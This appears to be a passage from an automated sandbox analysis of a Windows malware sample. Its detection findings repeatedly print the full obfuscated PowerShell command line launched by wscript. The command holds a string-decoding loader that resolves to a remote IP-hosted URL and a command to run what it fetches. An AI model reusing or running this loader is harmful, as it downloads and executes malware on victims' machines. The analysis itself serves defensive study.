Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Forbytter)$global:commercializing = [System.Text.Encoding]::ASCII.GetString($Rengue)$global:Uncrystallizabilities=$commercializing.substring($Kontekstfri,$Untastefulness)<#Hyperobtru
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 20_2_004044A4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACD86DCA push eax; iretd 2_2_00007FFAACD86DCD
